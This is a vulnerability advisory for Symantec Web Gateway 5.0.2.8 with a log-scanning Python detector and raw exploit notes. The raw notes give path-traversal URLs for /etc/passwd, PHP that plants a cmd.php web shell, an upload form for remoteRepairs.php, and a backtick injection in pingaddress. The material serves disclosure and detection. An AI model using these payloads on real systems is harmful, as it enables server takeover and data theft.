Vendor: Web Gateway
By: S2 Crew [Hungary]
CVSS: 8.8 (HIGH)
Title: File Include and OS Command Execution
CWE: 20
Product Name: Web Gateway
Affected Version From: 5.0.2.8
Affected Version To: 5.0.2.8
Patch Exists: YES
Related CVE: CVE-2012-0297, CVE-2012-0298
CPE: a:symantec:web_gateway:5.0.2.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2012

Symantec Web Gateway File Include and OS Command Execution Vulnerability

A vulnerability in Symantec Web Gateway 5.0.2.8 allows an attacker to include a remote file and execute OS commands because the application does not properly validate user-supplied input. An attacker can leverage it to gain access to sensitive information and execute arbitrary code on the server. The file include is present in the previewProxyError.php and releasenotes.php scripts. Additionally, the application allows an attacker to download and delete arbitrary files, and to execute arbitrary code via the uploadFile.php and remoteRepairs.php scripts.

Mitigation:

The vendor has released a patch to address this vulnerability. Additionally, users should ensure that all user-supplied input is properly validated and that the application is running the latest version.
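
To check whether an appliance was probed before the patch was applied, the request patterns listed in the advisory on this page can be matched against the Apache access_log. This is an added example, not code from Symantec, S2 Crew or Exploit-DB; the log lines are constructed, and the rules for what counts as a legitimate parameter value are assumptions marked in the comments.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
# Script -> query parameter that carries a file path in the advisory.
PATH_PARAMS = {
    "/spywall/previewProxyError.php": "err",
    "/spywall/releasenotes.php": "relfile",
    "/spywall/download_file.php": "d",
}
# POST bodies are absent from access_log, so any POST to these is flagged.
UPLOAD_SCRIPTS = {"/ciu/uploadFile.php", "/ciu/remoteRepairs.php"}
REQUEST_RE = re.compile(r'"(GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) before matching."""
    for _ in range(rounds):
        value = unquote(value)
    return value.replace("\\", "/")

def suspicious_path(param, value):
    # Assumption: legitimate `d` values live under /tmp/, others are bare names.
    outside = not value.startswith("/tmp/") if param == "d" else value.startswith("/")
    return ".." in value.split("/") or outside

def classify(line):
    """Return a finding label for one access_log line, or None if benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    method, target = m.groups()
    url = urlsplit(target)
    if method == "POST" and url.path in UPLOAD_SCRIPTS:
        return "post-to-upload-handler"
    param = PATH_PARAMS.get(url.path)  # None for scripts we do not track
    for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
        if suspicious_path(param, fully_decode(raw)):
            return f"path-in-{param}"
    return None

# Constructed sample lines (documentation address range), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2012:10:00:01 +0000] "GET /spywall/releasenotes.php?relfile=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1873',
    '198.51.100.9 - - [01/Jan/2012:10:00:05 +0000] "GET /spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2012:10:00:09 +0000] "GET /spywall/download_file.php?d=/var/www/html/ciu/.htaccess&name=.htaccess HTTP/1.1" 200 120',
    '198.51.100.7 - - [01/Jan/2012:10:00:14 +0000] "POST /ciu/remoteRepairs.php HTTP/1.1" 200 64',
]
if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry) or "ok", "<-", entry.split('"')[1])
```

The `pingaddress` injection and the `uploadLocation` field travel in POST bodies, so they only become visible with request-body logging or a WAF in front of the appliance.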

Exploit-DB raw data:

Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???

File include:
        https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd

File include and OS command execution:
        http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
        You can execute OS commands by just including the error_log:
        /usr/local/apache2/logs/
        -rw-r--r--   1 root   root  5925 Nov 15 07:25 access_log
        -rw-r--r--   1 root   root  3460 Nov 15 07:21 error_log

        Make a connection to port 80:
        <?php
        $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
        $cmd = "<?php system(\$_GET['cmd']); ?>";
        fputs($f,$cmd);
        fclose($f);
        print "Shell creation done<br>";
        ?>

Arbitrary file download and delete:
        https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
        d parameter: the complete filename
        After the download process the application removes the original file with root access! :)

        Command execution methods:
        1.Method
        Download and delete the /var/www/html/ciu/.htaccess file.
        After that you can access the ciu interface on the web.
        There is an upload script: /ciu/uploadFile.php
        User can control the filename and the upload location:
        $_FILES['uploadFile'];
        $_POST['uploadLocation'];

        2.Method
        <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
        <input type="file" name="uploadFile">
        <input type="text" name="action" value="upload">
        <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
        <input type="hidden" name="configuration" value="test">
        <input type="submit" value="upload!">
        </form>
	
        The "/var/www/html/spywall/cleaner" is writeable by www-data.

Command execution after authentication:

        http://192.168.82.207/spywall/adminConfig.php (this is a deprecated config file; it should be removed)

        From the modified POST message:
        Content-Disposition: form-data; name="pingaddress"
        127.0.0.1`whoami>/tmp/1234.txt`